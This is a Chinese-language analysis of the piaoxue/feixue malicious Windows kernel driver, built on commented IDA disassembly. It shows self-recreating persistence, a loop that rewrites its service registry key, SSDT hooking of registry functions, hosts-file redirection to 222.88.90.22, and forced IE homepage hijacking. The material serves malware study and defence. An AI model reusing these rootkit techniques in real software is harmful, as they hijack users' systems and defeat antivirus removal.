战神白起
一战成名
piaoxue/feixue驱动程序分析

首先是由于这个驱动是注册为在Boot Bus Extender组里的,所以在操作系统加载时,该驱动就会被加载

这时会执行DriverReinitializationRoutine这个例程:

; *************** S U B R O U T I N E ***************************************

DriverReinitializationRoutine proc near



DriverObject = dword ptr  4


  call Test_SystemRoot

;调用测试系统根目录的代码,检测系统根目录是否加载成功
  test eax, eax
  jnz short Root_Loaded
;若加载成功,则跳往Root_Loaded

  push eax  ; Context
  push offset DriverReinitializationRoutine ; DriverReinitializationRoutine
  push [esp+8+DriverObject] ; DriverObject
  call ds:IoRegisterDriverReinitialization
;若不成功,则调用Reinitialization函数,直到Root加载成功为止
  jmp short locret_116EC


Root_Loaded:
  push 1
  call ReCreateSYSFile


;若加载成功,则传入参数1,跳往ReCreateSYSFile.作用是检查自身的驱动文件及服务项是否存在
;l若不存在(被杀毒软件等杀掉)就重新建立,以达到其杀而复活的目的

locret_116EC:
  retn 0Ch
DriverReinitializationRoutine endp



;以下是这个ReCreateSYSFile函数

; *************** S U B R O U T I N E ***************************************


ReCreateSYSFile proc near

     ; start+12Ep
FileHandle = byte ptr -104h

arg_0  = dword ptr  8

  push ebp
  mov ebp, esp
  sub esp, 104h
  push esi
  push 104h  ; size_t
  lea eax, [ebp+FileHandle]
  push 0  ; int
  push eax  ; void *
  call memset
  push offset unk_11B30

;这里存放着驱动的随机文件名

  lea eax, [ebp+FileHandle]
  push offset s_SystemrootS_1 ; "[url=file://\\SystemRoot\\system32\\drivers\\%s.sys]\\SystemRoot\\system32\\drivers\\%s.sys[/url]"
  push eax  ; char *
  call ds:sprintf

;生成当前驱动的随机文件名

  mov esi, ds:__imp_ZwClose
  add esp, 18h
  cmp [ebp+arg_0], 1

;检测arg_0参数是否为1
;如果=1则是在刚才在Reinit那里传入的,继续,否则跳loc_115d1

  jnz short loc_115D1

  mov eax, Handle

  test eax, eax

  jz short loc_115C0

;Handle是否为0
;为0则跳loc_11520

  push eax  ; Handle
  call esi ; __imp_ZwClose

;不为0,关闭文件

  and Handle, 0

;handle清0

loc_115C0:  
  push offset dword_12050 ; int
  lea eax, [ebp+FileHandle]
  push eax  ; FileHandle
  call ReCreateFile

;调用文件重建子程序

loc_115D1:   
  cmp [ebp+arg_0], 0
  jnz short loc_115FB

;若是Reinit那里push 1的,则跳loc_115fb

  mov eax, dword_12050
  test eax, eax
  jz short loc_115EA
  push eax  ; Handle
  call esi ; __imp_ZwClose
  and dword_12050, 0

loc_115EA:
  push offset Handle ; int
  lea eax, [ebp+FileHandle]
  push eax  ; FileHandle
  call ReCreateFile

loc_115FB:

;这里结束此子程序
  pop esi
  leave
  retn 4
sub_1156A endp



;;下面是文件重建子程序:
;;ReCreateFile


; *************** S U B R O U T I N E ***************************************
; Attributes: bp-based frame
; int __stdcall sub_109D2(HANDLE FileHandle,int)

ReCreateFile proc near

ObjectAttributes= OBJECT_ATTRIBUTES ptr -34h
IoStatusBlock = _IO_STATUS_BLOCK ptr -1Ch
DestinationString= STRING ptr -14h
UnicodeString = UNICODE_STRING ptr -0Ch
var_4  = dword ptr -4
FileHandle = dword ptr  8
arg_4  = dword ptr  0Ch


push ebp
  mov ebp, esp
  sub esp, 34h
  push esi
  xor esi, esi
  cmp [ebp+FileHandle], esi
  mov [ebp+var_4], esi
  jz loc_10AA0
  push [ebp+FileHandle] ; SourceString
  lea eax, [ebp+DestinationString]
  push eax  ; DestinationString
  call ds:RtlInitAnsiString


  push 1  ; AllocateDestinationString
  lea eax, [ebp+DestinationString]
  push eax  ; SourceString
  lea eax, [ebp+UnicodeString]
  push eax  ; DestinationString
  call ds:RtlAnsiStringToUnicodeString

;ansi字符串转 unicode字符串,因内核函数接口参数都必须用unicode编码

  cmp eax, esi
  jl loc_10AA0
  lea ecx, [ebp+UnicodeString]
  push ebx
  mov [ebp+ObjectAttributes.ObjectName], ecx
  mov ecx, [ebp+arg_4]
  cmp [ecx+4], esi
  push edi
  mov edi, ds:ZwCreateFile
  mov [ebp+ObjectAttributes.Length], 18h
  mov [ebp+ObjectAttributes.RootDirectory], esi
  mov [ebp+ObjectAttributes.Attributes], 240h
  mov [ebp+ObjectAttributes.SecurityDescriptor], esi
  mov [ebp+ObjectAttributes.SecurityQualityOfService], esi
  mov ebx, 80h
  jnz short loc_10A5B
  push esi  ; EaLength
  push esi  ; EaBuffer
  push 40h  ; CreateOptions
  push 1  ; CreateDisposition
  push 1  ; ShareAccess
  push ebx  ; FileAttributes
  push esi  ; AllocationSize
  lea eax, [ebp+IoStatusBlock]
  push eax  ; IoStatusBlock
  lea eax, [ebp+ObjectAttributes]
  push eax  ; ObjectAttributes
  push 80000000h ; DesiredAccess
  lea eax, [ebp+FileHandle]
  push eax  ; FileHandle
  call edi ; ZwCreateFile

;调用ZwCreateFile来创建文件
loc_10A5B:
  mov ecx, [ebp+arg_4]
  cmp dword ptr [ecx+4], 1
  jnz short loc_10A81
  push esi  ; EaLength
  push esi  ; EaBuffer
  push 40h  ; CreateOptions
  push 1  ; CreateDisposition
  push 1  ; ShareAccess
  push ebx  ; FileAttributes
  push esi  ; AllocationSize
  lea eax, [ebp+IoStatusBlock]
  push eax  ; IoStatusBlock
  lea eax, [ebp+ObjectAttributes]
  push eax  ; ObjectAttributes
  push 10000h  ; DesiredAccess
  lea eax, [ebp+FileHandle]
  push eax  ; FileHandle
  call edi ; ZwCreateFile

loc_10A81:  cmp eax, esi
  pop edi
  pop ebx
  jl short loc_10A96
  mov eax, [ebp+FileHandle]
  mov ecx, [ebp+arg_4]
  mov [ecx], eax
  mov [ebp+var_4], 1

loc_10A96:
  lea eax, [ebp+UnicodeString]
  push eax  ; UnicodeString
  call ds:RtlFreeUnicodeString

loc_10AA0:

  mov eax, [ebp+var_4]
  pop esi
  leave
  retn 8
sub_109D2 endp



以上就是驱动在操作系统 加载时所做的事,主要就是还原及占住自身,防止被杀毒软件的重启后删除或驱动程序破坏
start  proc near
;以下是驱动程序启动时执行的代码

AnsiString = STRING ptr -14h
SourceString = UNICODE_STRING ptr -0Ch
var_4  = dword ptr -4
DriverObject = dword ptr  8
Handle  = dword ptr  0Ch
  push ebp
  mov ebp, esp
  sub esp, 14h
  push edi
  push [ebp+Handle]
  xor edi, edi
  mov [ebp+var_4], edi
  call sub_11600
  test eax, eax
  jz short loc_11725
  mov eax, 0C0000001h
  jmp loc_1186F

loc_11725:


  push ebx
  push esi
  push 104h  ; size_t
  push edi  ; int
  push offset unk_11B30 ; void *
  call memset
  mov esi, 208h
  push esi  ; size_t
  push edi  ; int
  mov ebx, offset word_11C38
  push ebx  ; void *
  call memset
  push esi  ; size_t
  push edi  ; int
  mov esi, offset unk_11E40
  push esi  ; void *
  call memset
  mov eax, [ebp+Handle]
  movzx ecx, word ptr [eax]
  push ecx  ; size_t
  push dword ptr [eax+4] ; void *
  push esi  ; void *
  call memcpy
  push esi  ; wchar_t *
  call ds:_wcslwr
  push 5Ch  ; wchar_t
  push esi  ; wchar_t *
  call ds:wcsrchr
  add esp, 3Ch
  cmp eax, edi
  jz loc_1186A
  add eax, 2
  push eax  ; SourceString
  lea eax, [ebp+SourceString]
  push eax  ; DestinationString
  call ds:RtlInitUnicodeString
  movzx eax, [ebp+SourceString.Length]
  push eax  ; size_t
  push [ebp+SourceString.Buffer] ; void *
  push ebx  ; void *
  call memcpy
  push ebx  ; wchar_t *
  call ds:_wcslwr
  add esp, 10h
  push 1  ; AllocateDestinationString
  lea eax, [ebp+SourceString]
  push eax  ; SourceString
  lea eax, [ebp+AnsiString]
  push eax  ; DestinationString
  call ds:RtlUnicodeStringToAnsiString
  cmp eax, edi
  mov [ebp+var_4], eax
  jl loc_1186A
  movzx eax, [ebp+AnsiString.Length]
  push eax  ; size_t
  push [ebp+AnsiString.Buffer] ; void *
  mov esi, offset unk_11B30
  push esi  ; void *
  call memcpy
  push esi  ; char *
  call ds:_strlwr
  add esp, 10h
  call GetEPAddress
;此子程序的用处是取得进程名在Eprocess中偏移


  mov esi, dssCreateSystemThread
  push edi  ; StartContext
  push offset sub_10AA8 ; StartRoutine
  push edi  ; ClientId
  push edi  ; ProcessHandle
  push edi  ; ObjectAttributes
  mov dword_12048, eax
  push edi  ; DesiredAccess
  lea eax, [ebp+Handle]
  push eax  ; ThreadHandle
  call esi ; PsCreateSystemThread

;这里创建一个入口为sub_10AA8的系统线程

  push [ebp+Handle] ; Handle
  mov ebx, ds:__imp_ZwClose
  call ebx ; __imp_ZwClose
  mov dword_12054, 1
  mov dword_12050, edi
  mov dword_1205C, edi
  mov Handle, edi
  call Test_SystemRoot

;检查系统Root目录是否加载成功


  test eax, eax
  jz short loc_1184D
;若不成功则跳loc_1184D

  push 1
  call ReCreateSYSFile

;这里重建驱动程序文件

  push edi  ; StartContext
  push offset StartRoutine ; StartRoutine
  push edi  ; ClientId
  push edi  ; ProcessHandle
  push edi  ; ObjectAttributes
  push edi  ; DesiredAccess
  lea eax, [ebp+Handle]
  push eax  ; ThreadHandle
  call esi ; PsCreateSystemThread

;创建一个入口为StartRoutine的系统线程

  push [ebp+Handle] ; Handle
  call ebx ; __imp_ZwClose
  jmp short loc_11860
; ---------------------------------------------------------------------------

loc_1184D:
;这里是TestSystemRoot不成功时跳向的地方


  push [ebp+DriverObject] ; DriverObject
  call sub_116EF

;这里是重调用IoRegisterDriverReinitialization
;也就是继续等待直到SystemRoot加载成功


  push edi  ; Remove
  push offset NotifyRoutine ; NotifyRoutine
  call PsSetCreateProcessNotifyRoutine

;设置Notify例程,入口为NotifyRoutine


loc_11860:

  lea eax, [ebp+AnsiString]
  push eax  ; AnsiString
  call ds:RtlFreeAnsiString

loc_1186A:    ; CODE XREF: start+78j start+B9j
  mov eax, [ebp+var_4]
  pop esi
  pop ebx

loc_1186F:    ; CODE XREF: start+1Dj
  pop edi
  leave
  retn 8
start  endp


; *************** S U B R O U T I N E ***************************************

GetEPAddress proc near


  push 0Ch
  push offset dword_105D0
  call sub_118B0
  call ds:IoGetCurrentProcess
  mov ebx, eax

;Eprocess基地址

  xor edi, edi]

;初始化偏移为0

  mov [ebp-4], edi
  mov esi, offset s_System ; "System"

;进程名串

loc_10F84:

  mov [ebp-1Ch], edi
  cmp edi, 3000h

;在12K范围中扫描

  jge short loc_10FBA
  push esi  ; char *
  call strlen
;取字串长
  push eax  ; size_t
  lea eax, [edi+ebx]
  push eax  ; char *
  push esi  ; char *
  call ds:strncmp

;比较扫描指针处是否为进程名

  add esp, 10h
  test eax, eax
  jnz short loc_10FB0
  or dword ptr [ebp-4], 0FFFFFFFFh
  mov eax, edi
  jmp short loc_10FC0
; ---------------------------------------------------------------------------
loc_10FB0:
  inc edi
  jmp short loc_10F84
; ---------------------------------------------------------------------------
loc_10FB3:
  xor eax, eax
  inc eax
  retn
; ---------------------------------------------------------------------------
loc_10FB7:
  mov esp, [ebp-18h]

loc_10FBA:  or dword ptr [ebp-4], 0FFFFFFFFh
  xor eax, eax

loc_10FC0:
  call sub_118EB
  retn
GetEPAddress endp ; sp = -8



sub_118EB proc near
mov     ecx, [ebp-10h]
mov     large fs:0, ecx
pop     ecx
pop     edi
pop     esi
pop     ebx
leave
push    ecx
retn
sub_118EB endp

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
ReCreateSYSFile proc near


FileHandle = byte ptr -104h
arg_0  = dword ptr  8
  push ebp
  mov ebp, esp
  sub esp, 104h
  push esi
  push 104h  ; size_t
  lea eax, [ebp+FileHandle]
  push 0  ; int
  push eax  ; void *
  call memset
  push offset unk_11B30
  lea eax, [ebp+FileHandle]
  push offset s_SystemrootS_1 ; "[url=file://\\SystemRoot\\system32\\drivers\\%s.sys]\\SystemRoot\\system32\\drivers\\%s.sys[/url]"
  push eax  ; char *
  call ds:sprintf

;得到驱动文件名

  mov esi, ds:__imp_ZwClose


  add esp, 18h
  cmp [ebp+arg_0], 1
  jnz short loc_115D1
  mov eax, Handle
  test eax, eax
  jz short loc_115C0
  push eax  ; Handle
  call esi ; __imp_ZwClose

;关闭文件

  and Handle, 0

loc_115C0:
  push offset dword_12050 ; int
  lea eax, [ebp+FileHandle]
  push eax  ; FileHandle
  call ReCreateFile

loc_115D1:    ; CODE XREF: sub_1156A+41j
  cmp [ebp+arg_0], 0
  jnz short loc_115FB
  mov eax, dword_12050
  test eax, eax
  jz short loc_115EA
  push eax  ; Handle
  call esi ; __imp_ZwClose
  and dword_12050, 0

loc_115EA:
  push offset Handle ; int
  lea eax, [ebp+FileHandle]
  push eax  ; FileHandle
  call ReCreateFile

loc_115FB:
  pop esi
  leave
  retn 4
ReCreateSYSFile endp


sub_116EF proc near  ; CODE XREF: start+14Dp
DriverObject = dword ptr  4


  push 0  ; Context
  push offset DriverReinitializationRoutine ; DriverReinitializationRoutine
  push [esp+8+DriverObject] ; DriverObject
  call ds:IoRegisterDriverReinitialization
;调用IoRegisterDriverReinitialization
;继续等待SystemRoot加载成功



  retn 4
sub_116EF endp
;;接下来是分析建立的一个系统线程
;;指向sub_10AA8

; *************** S U B R O U T I N E ***************************************
; Attributes: bp-based frame
; void __stdcall sub_10AA8(PVOID)
sub_10AA8 proc near

SourceString = word ptr -37Ch
var_312  = dword ptr -312h
var_174  = byte ptr -174h
var_70  = dword ptr -70h
DestinationString= UNICODE_STRING ptr -68h
var_60  = dword ptr -60h
var_58  = dword ptr -58h
var_50  = dword ptr -50h
ValueName = UNICODE_STRING ptr -48h
var_40  = dword ptr -40h
var_38  = dword ptr -38h
ObjectAttributes= OBJECT_ATTRIBUTES ptr -30h
Interval = LARGE_INTEGER ptr -18h
var_10  = dword ptr -10h
Data  = dword ptr -0Ch
var_8  = dword ptr -8
Handle  = dword ptr -4



push ebp
  mov ebp, esp
  sub esp, 37Ch
  push ebx
  push esi
  push edi
  push 40h
  pop ecx
  xor eax, eax
  xor ebx, ebx
  mov [ebp+var_174], bl
  lea edi, [ebp-173h]
  rep stosd
  stosw
  stosb
  push 1Ah
  pop ecx
  mov esi, offset s_RegistryMachi ; \registry\machine\system\currentcontrolset\services\

;;系统服务注册表项


  lea edi, [ebp+SourceString]
  rep movsd
  movsw
  push 67h
  pop ecx
  xor eax, eax
  lea edi, [ebp+var_312]
  rep stosd
  stosw
  mov edi, offset word_11C38
  lea eax, [ebp+SourceString]
  push edi  ; wchar_t *
  push eax  ; wchar_t *
  mov [ebp+var_8], 1
  call ds:wcscat
  mov esi, ds:RtlInitUnicodeString
  pop ecx
  pop ecx
  lea eax, [ebp+SourceString]
  push eax  ; SourceString
  lea eax, [ebp+DestinationString]
  push eax  ; DestinationString
  call esi ; RtlInitUnicodeString
  lea eax, [ebp+DestinationString]
  mov [ebp+ObjectAttributes.ObjectName], eax
  push offset s_Imagepath ; "ImagePath"

;服务的ImagePatch属性

  lea eax, [ebp+ValueName]
  push eax  ; DestinationString
  mov [ebp+ObjectAttributes.Length], 18h
  mov [ebp+ObjectAttributes.RootDirectory], ebx
  mov [ebp+ObjectAttributes.Attributes], 240h
  mov [ebp+ObjectAttributes.SecurityDescriptor], ebx
  mov [ebp+ObjectAttributes.SecurityQualityOfService], ebx
  call esi ; RtlInitUnicodeString
  push offset s_Start ; "Start"
;服务的启动属性


  lea eax, [ebp+var_50]
  push eax  ; DestinationString
  call esi ; RtlInitUnicodeString
  push offset s_Type ; "Type"
;服务的类型属性


  lea eax, [ebp+var_38]
  push eax  ; DestinationString
  call esi ; RtlInitUnicodeString
  push offset s_Errorcontrol ; "ErrorControl"

;ErrorControl


  lea eax, [ebp+var_58]
  push eax  ; DestinationString
  call esi ; RtlInitUnicodeString
  push offset s_Displayname ; "DisplayName"
;显示名


  lea eax, [ebp+var_70]
  push eax  ; DestinationString
  call esi ; RtlInitUnicodeString
  push offset s_Group ; "Group"

;组
  lea eax, [ebp+var_40]
  push eax  ; DestinationString
  call esi ; RtlInitUnicodeString
  or dword ptr [ebp+Interval+4], 0FFFFFFFFh
  push offset unk_11B30
  lea eax, [ebp+var_174]
  push offset s_System32Drive ; "System32\\DRIVERS\\%s.sys"


  push eax  ; char *
  mov dword ptr [ebp+Interval], 0FE363C80h
  call ds:sprintf

得到驱动随机文件名
  add esp, 0Ch
  lea eax, [ebp+var_174]
  push eax  ; SourceString
  lea eax, [ebp+var_60]
  push eax  ; DestinationString
  call ds:RtlInitAnsiString
  push 1  ; AllocateDestinationString
  lea eax, [ebp+var_60]
  push eax  ; SourceString
  lea eax, [ebp+var_10]
  push eax  ; DestinationString
  call ds:RtlAnsiStringToUnicodeString
  test eax, eax
  jl loc_10C93
  mov esi, ds:__imp_ZwSetValueKey

loc_10BCF:
  push ebx  ; Disposition
  push ebx  ; CreateOptions
  push ebx  ; Class
  push ebx  ; TitleIndex
  lea eax, [ebp+ObjectAttributes]
  push eax  ; ObjectAttributes
  push 2  ; DesiredAccess
  lea eax, [ebp+Handle]
  push eax  ; KeyHandle
  call ds:ZwCreateKey

;调用ZwCreateKey创建这个服务键值


  test eax, eax
  jl loc_10C82
;创建是否成功
;如果失败了 等待下次执行执行线程继续试着写键值


  movzx eax, word ptr [ebp+var_10]
  inc eax
  inc eax
  push eax  ; DataSize
  push [ebp+Data] ; Data
  lea eax, [ebp+ValueName]
  push 2  ; Type
  push ebx  ; TitleIndex
  push eax  ; ValueName
  push [ebp+Handle] ; KeyHandle
  mov [ebp+var_8], 1
  call esi ; __imp_ZwSetValueKey

;调用ZwSetValueKey来写注册表服务键值
;以下的ZwSetValueKey都是在写这个服务键值的各个部分
;(ImagePath,Type.......)

  push 4  ; DataSize
  lea eax, [ebp+var_8]
  push eax  ; Data
  push 4  ; Type
  push ebx  ; TitleIndex
  lea eax, [ebp+var_38]
  push eax  ; ValueName
  push [ebp+Handle] ; KeyHandle
  call esi ; __imp_ZwSetValueKey
  push 4  ; DataSize
  lea eax, [ebp+var_8]
  push eax  ; Data
  push 4  ; Type
  push ebx  ; TitleIndex
  lea eax, [ebp+var_58]
  push eax  ; ValueName
  push [ebp+Handle] ; KeyHandle
  call esi ; __imp_ZwSetValueKey
  push edi  ; wchar_t *
  call ds:wcslen
  pop ecx
  shl eax, 1
  push eax  ; DataSize
  push edi  ; Data
  push 1  ; Type
  push ebx  ; TitleIndex
  lea eax, [ebp+var_70]
  push eax  ; ValueName
  push [ebp+Handle] ; KeyHandle
  call esi ; __imp_ZwSetValueKey
  push offset s_SystemBusExte ; "System Bus Extender"
  call ds:wcslen
  pop ecx
  shl eax, 1
  push eax  ; DataSize
  push offset s_SystemBusExte ; "System Bus Extender"
;设置 组为System Bus Extender


push 1  ; Type
  push ebx  ; TitleIndex
  lea eax, [ebp+var_40]
  push eax  ; ValueName
  push [ebp+Handle] ; KeyHandle
  call esi ; __imp_ZwSetValueKey
  push 4  ; DataSize
  lea eax, [ebp+var_8]
  push eax  ; Data
  push 4  ; Type
  push ebx  ; TitleIndex
  lea eax, [ebp+var_50]
  push eax  ; ValueName
  push [ebp+Handle] ; KeyHandle
  mov [ebp+var_8], ebx
  call esi ; __imp_ZwSetValueKey
  push [ebp+Handle] ; Handle
  call ds:__imp_ZwClose


;调用Zw_Close关闭注册表键值


loc_10C82:   lea eax, [ebp+Interval]
  push eax  ; Interval
  push ebx  ; Alertable
  push ebx  ; WaitMode
  call ds:KeDelayExecutionThread

;等待知道该线程再次被CPU执行


  jmp loc_10BCF
;跳向loc_10BCF
;再来创建一遍服务键值

;这样只要这个线程存在,就无法删除它的服务项---------会一直不停地创建自己的服务项目


; ---------------------------------------------------------------------------
loc_10C93:
  pop edi
  pop esi
  pop ebx
  leave
  retn 4
sub_10AA8 endp


如上,该线程的作用就是一直不停地重写自己的注册表服务项。以达到防止自身注册表项目被删除的目的
;以下分析系统的StartRoutine子程序
;start会创建一个指向StartRoutine的线程
;这个线程很简单



; *************** S U B R O U T I N E ***************************************
; Attributes: bp-based frame
; void __stdcall StartRoutine(PVOID)

StartRoutine proc near  


Interval = LARGE_INTEGER ptr -8
  push ebp
  mov ebp, esp
  push ecx
  push ecx
  or dword ptr [ebp+Interval+4], 0FFFFFFFFh
  mov dword ptr [ebp+Interval], 0FE363C80h
  call Hook_System_Service

;该子程序的主要作用是挂钩以下系统服务函数:
;ZwOpenKey
;ZwSetValueKey
;ZwEnumerateKey
;ZwClose

;也就是挂钩注册表相关函数


  call Write_Bad_Host;

;该子程序的主要作用是篡改系统Hosts表
;将以下内容写入hosts中

;222.88.90.22    9505.com
;222.88.90.22   www.9505.com

;222.88.90.22    4199.com
;222.88.90.22  www.4199.com
;127.0.0.1       www.arswp.com


loc_111AB:
  push offset s_Www_feixue_ne ; www.feixue.net

  call Write_StartPage

;这里的作用是将www.feixue.net这个地址写入IE的首页设置中

  lea eax, [ebp+Interval]
  push eax  ; Interval
  push 0  ; Alertable
  push 0  ; WaitMode
  call ds:KeDelayExecutionThread

;等待直到下次执行次线程
  jmp short loc_111AB

;跳回loc_111AB,也就是不停地写入注册表的IE首页设置
;只要此线程存在,就无法将IE首页设置修改掉,因为它会不断被调用,不断重写IE首页设置
StartRoutine endp

; *************** S U B R O U T I N E ***************************************

Hook_System_Service proc near

  call sub_11368
;此子程序是用来创建一个Section,供修改SSDT之用
;篇幅关系不复制程序代码了

  test eax, eax
  jnz short loc_10ED5
;成功创建并映射
  retn
; ---------------------------------------------------------------------------
loc_10ED5:    ; CODE XREF: sub_10ECB+7j
  push ebx
  push ebp
  push esi
  mov esi, ds:__imp_ZwOpenKey
  push edi
  push esi
  call sub_11466

;这个函数是Hook的核心函数
;先Hook ZwOpenKey函数

mov edi, ds:__imp_ZwSetValueKey
  push edi
  mov off_11900, eax
  call sub_11466

;Hook ZwSetValueKey函数

  mov ebx, ds:__imp_ZwEnumerateKey
  push ebx
  mov off_11908, eax
  call sub_11466

;Hook ZwEnumerateKey函数


  mov ebp, ds:__imp_ZwClose
  push ebp
  mov off_1190C, eax
  call sub_11466

;Hook ZwClose函数
  mov off_11904, eax
  call sub_114A0
  xor eax, eax
  cmp off_11900, eax
  jz short loc_10F47
  cmp off_11908, eax
  jz short loc_10F47
  cmp off_1190C, eax
  jz short loc_10F47
  cmp off_11904, eax
  jz short loc_10F47
  inc eax
  jmp short loc_10F61
; ---------------------------------------------------------------------------
loc_10F47:
  mov off_11900, esi
  mov off_11904, ebp
  mov off_11908, edi
  mov off_1190C, ebx
  xor eax, eax

loc_10F61:
  pop edi
  pop esi
  pop ebp
  pop ebx
  retn
sub_10ECB endp

sub_11466 proc near

;Hook子程序

arg_0  = dword ptr  4
  mov eax, BaseAddress
  test eax, eax
  jz short locret_1149D
  mov ecx, [esp+arg_0]
  mov ecx, [ecx+1]
  test ch, 30h
  push esi
  jnz short loc_1149A
  push ecx
  push eax
  push dword_1191C
  call sub_10E71
  mov esi, eax
  push esi  ; VirtualAddress
  call ds:MmIsAddressValid
  test al, al
  jz short loc_1149A
  mov eax, esi
  jmp short loc_1149C

; ---------------------------------------------------------------------------
loc_1149A:
  xor eax, eax

loc_1149C:
  pop esi

locret_1149D:   retn 4
sub_11466 endp

sub_10E71 proc near

var_8  = dword ptr -8
var_4  = dword ptr -4
arg_0  = dword ptr  8
arg_4  = dword ptr  0Ch
arg_8  = dword ptr  10h
  push ebp
  mov ebp, esp
  push ecx
  push ecx
  push ebx
  push edi
  mov edi, [ebp+arg_4]
  push edi
  xor ebx, ebx
  call sub_10E60
  test eax, eax
  jz short loc_10EC5
  push esi
  push eax
  push edi
  call sub_10CE7
  mov esi, eax
  test esi, esi
  jz short loc_10EC4
  lea eax, [ebp+var_4]
  push eax
  lea eax, [ebp+arg_4]
  push eax
  lea eax, [ebp+var_8]
  push eax
  push edi
  call sub_10C9A
  mov eax, [ebp+arg_8]
  mov ecx, [ebp+arg_4]
  lea eax, [esi+eax*4]
  add eax, edi
  mov eax, [eax]
  sub eax, [ecx+1Ch]
  cmp eax, [ecx+38h]
  jnb short loc_10EC2
  mov ecx, [ebp+arg_0]
  lea ebx, [eax+ecx]

loc_10EC2:    ; CODE XREF: sub_10E71+49j
  mov eax, ebx

loc_10EC4:    ; CODE XREF: sub_10E71+22j
  pop esi

loc_10EC5:    ; CODE XREF: sub_10E71+14j
  pop edi
  pop ebx
  leave
  retn 0Ch
sub_10E71 endp

sub_10E60 proc near
arg_0= dword ptr  4
push    offset s_Keservicedesc ; "KeServiceDescriptorTable"

;push KeServiceDescriptorTable..
;终于到这里了。。。修改这个表咯。。。。

push    [esp+4+arg_0]
call    sub_10DE9
retn    4
sub_10E60 endp

*************** S U B R O U T I N E ***************************************
;;下面这个子程序是修改系统HOSTS表

; Attributes: bp-based frame
sub_107BD proc near


FileInformation = dword ptr -5Ch
var_54  = dword ptr -54h
ObjectAttributes= OBJECT_ATTRIBUTES ptr -44h
var_2C  = dword ptr -2Ch
DestinationString= UNICODE_STRING ptr -24h
IoStatusBlock = _IO_STATUS_BLOCK ptr -1Ch
FileHandle = dword ptr -14h
var_10  = dword ptr -10h
Length  = dword ptr -0Ch
P  = dword ptr -8
Handle  = dword ptr -4


  push ebp
  mov ebp, esp
  sub esp, 5Ch
  push ebx
  push esi
  push offset SourceString ; "[url=file://\\SystemRoot\\system32\\drivers\\etc\\hosts]\\SystemRoot\\system32\\drivers\\etc\\hosts[/url]"
;这里是要写的系统HOSTS表位置哦!

  lea eax, [ebp+DestinationString]
  push eax  ; DestinationString
  call ds:RtlInitUnicodeString
  push 18h
  pop esi
  xor ebx, ebx
  push ebx  ; EaLength
  push ebx  ; EaBuffer
  push 60h  ; CreateOptions
  push 1  ; CreateDisposition
  push 3  ; ShareAccess
  push 80h  ; FileAttributes
  lea eax, [ebp+DestinationString]
  mov [ebp+ObjectAttributes.ObjectName], eax
  push ebx  ; AllocationSize
  lea eax, [ebp+IoStatusBlock]
  push eax  ; IoStatusBlock
  lea eax, [ebp+ObjectAttributes]
  push eax  ; ObjectAttributes
  push 100003h  ; DesiredAccess
  lea eax, [ebp+Handle]
  push eax  ; FileHandle
  mov [ebp+ObjectAttributes.Length], esi
  mov [ebp+ObjectAttributes.RootDirectory], ebx
  mov [ebp+ObjectAttributes.Attributes], 240h
  mov [ebp+ObjectAttributes.SecurityDescriptor], ebx
  mov [ebp+ObjectAttributes.SecurityQualityOfService], ebx
  mov [ebp+Handle], ebx
  call ds:ZwCreateFile
  test eax, eax
  jl loc_109CC
  cmp dword ptr [ebp+IoStatusBlock.anonymous_0], ebx
  jl loc_109CC
  push 5  ; FileInformationClass
  push esi  ; FileInformationLength
  lea eax, [ebp+FileInformation]
  push eax  ; FileInformation
  lea eax, [ebp+IoStatusBlock]
  push eax  ; IoStatusBlock
  push [ebp+Handle] ; FileHandle
  mov [ebp+P], ebx
  call ds:ZwQueryInformationFile
  test eax, eax
  jl loc_109AB
  mov eax, [ebp+var_54]
  cmp eax, 20h
  mov [ebp+Length], eax
  jbe loc_109AB
  push edi
  mov edi, ds:ExAllocatePoolWithTag
  inc eax
  mov esi, 206B6444h
  push esi  ; Tag
  push eax  ; NumberOfBytes
  push ebx  ; PoolType
  mov [ebp+var_10], eax
  call edi ; ExAllocatePoolWithTag
  cmp eax, ebx
  mov [ebp+P], eax
  jz loc_109AA
  push [ebp+var_10] ; size_t
  push ebx  ; int
  push eax  ; void *
  call memset
  add esp, 0Ch
  push ebx  ; Key
  push ebx  ; ByteOffset
  push [ebp+Length] ; Length
  lea eax, [ebp+IoStatusBlock]
  push [ebp+P]  ; Buffer
  push eax  ; IoStatusBlock
  push ebx  ; ApcContext
  push ebx  ; ApcRoutine
  push ebx  ; Event
  push [ebp+Handle] ; FileHandle
  call ds:ZwReadFile

;先来读入文件!


  cmp eax, ebx
  mov ecx, [ebp+Length]
  mov edx, [ebp+P]
  mov [ecx+edx], bl
  jl loc_109AA
  cmp [ebp+IoStatusBlock.Information], ecx
  jnz loc_109AA
  push offset s_Feixue ; "feixue"
  push edx  ; int
  call sub_10771
  test eax, eax
  jnz short loc_108DC
  push offset s_Piaoxue ; "piaoxue"
  push [ebp+P]  ; int
  call sub_10771

;这里是检测系统hosts里面有没有
;piaoxue或者feixue
;如果有,那就说明HOSTS表已经被感染了!那就不改了!


  test eax, eax
  jz loc_109AA

Write_Bad_host:    ; CODE XREF: sub_107BD+108j
  push [ebp+var_10] ; size_t
  push ebx  ; int
  push [ebp+P]  ; void *
  call memset
  push 8  ; size_t
  lea eax, [ebp+var_2C]
  push ebx  ; int
  push eax  ; void *
  call memset
  add esp, 18h
  push 0Eh  ; FileInformationClass
  push 8  ; FileInformationLength
  lea eax, [ebp+var_2C]
  push eax  ; FileInformation
  lea eax, [ebp+IoStatusBlock]
  push eax  ; IoStatusBlock
  push [ebp+Handle] ; FileHandle
  call ds:ZwSetInformationFile
  test eax, eax
  jl loc_109AA
  push esi  ; Tag
  mov esi, 100h
  push esi  ; NumberOfBytes
  push ebx  ; PoolType
  call edi ; ExAllocatePoolWithTag
  mov edi, eax
  cmp edi, ebx
  jz short loc_10976
  push esi  ; size_t
  push ebx  ; int
  push edi  ; void *
  call memset
  push offset s_222_88_90_229 ; "222.88.90.22   9505.com"
  push offset s_222_88_90_22W ; "222.88.90.22   www.9505.com"
  push offset s_222_88_90_224 ; "222.88.90.22   4199.com"
  push offset s_222_88_90_2_0 ; "222.88.90.22   www.4199.com"
  push offset s_127_0_0_1Www_ ; "127.0.0.1   www.arswp.com"
  push offset s_SSSSS ; "%s\r\n%s\r\n%s\r\n%s\r\n%s\r\n"

; 这里就是要修改的HOSTS表内容!!
;看到arswp.com了吧!!!
;
;******************************************************************
;******************************************************************
;                                        有猫腻的!!
;
;
;******************************************************************
;******************************************************************
  push edi  ; char *
  call ds:sprintf
  add esp, 28h
